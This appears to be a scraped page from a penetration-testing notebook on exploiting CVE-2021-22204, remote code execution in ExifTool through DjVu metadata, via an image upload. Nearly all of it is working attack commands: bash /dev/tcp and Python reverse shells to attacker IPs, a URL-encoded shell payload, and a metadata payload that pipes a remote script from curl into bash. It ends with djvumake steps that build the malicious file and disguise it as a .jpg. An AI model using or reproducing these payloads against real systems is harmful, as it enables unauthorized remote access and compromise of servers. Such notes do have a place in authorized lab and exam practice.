Exfiltrated
Privilege Escalation via Image Upload — DJVU RCE (CVE-2021-22204)
Last updated
Privilege Escalation via Image Upload — DJVU RCE (CVE-2021-22204)
Last updated
bash -c "bash -i >& /dev/tcp/192.168.45.240/9999 0>&1"
# URL-encoded payload:
bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.45.240%2F9999%200%3E%261%22sudo apt install -y djvulibre-bin#!/bin/bash
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.118.11",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'echo '(metadata "\c${system (\'curl http://192.168.118.11/shell.sh | bash\')}")' > exploit
djvumake exploit.djvu INFO=0,0 BGjp=/dev/null ANTa=exploit
mv exploit.djvu exploit.jpg